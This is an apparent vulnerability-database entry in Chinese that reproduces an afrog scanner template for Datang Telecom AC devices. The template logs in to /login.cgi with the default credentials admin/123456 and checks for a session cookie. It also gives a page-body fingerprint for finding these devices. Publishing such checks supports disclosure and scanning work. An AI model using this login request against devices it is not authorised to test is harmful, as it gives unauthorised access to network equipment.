datang-ac-default-password: Datang AC Default Password

日期: 2025-08-01 | 影响软件: datang | POC: 已公开

漏洞描述

body="大唐电信科技股份公司"

PoC代码[已公开]

id: datang-ac-default-password

info:
  name: Datang AC Default Password
  author: B1anda0
  severity: high
  verified: true
  description: |-
    body="大唐电信科技股份公司"
  tags: datang,ac,default-password
  created: 2023/06/24

rules:
  r0:
    request:
      method: POST
      path: /login.cgi
      body: user=admin&password1=%E8%AF%B7%E8%BE%93%E5%85%A5%E5%AF%86%E7%A0%81&password=123456&Submit=%E7%AB%8B%E5%8D%B3%E7%99%BB%E5%BD%95
    expression: response.status == 200 && response.headers["set-cookie"].contains("ac_userid=admin,ac_passwd=") && response.body.bcontains(b"window.open('index.htm?_")
expression: r0()
来源: https://github.com/zan8in/afrog/blob/main/pocs/afrog-pocs/default-pwd/datang-ac-default-password.yaml

相关漏洞推荐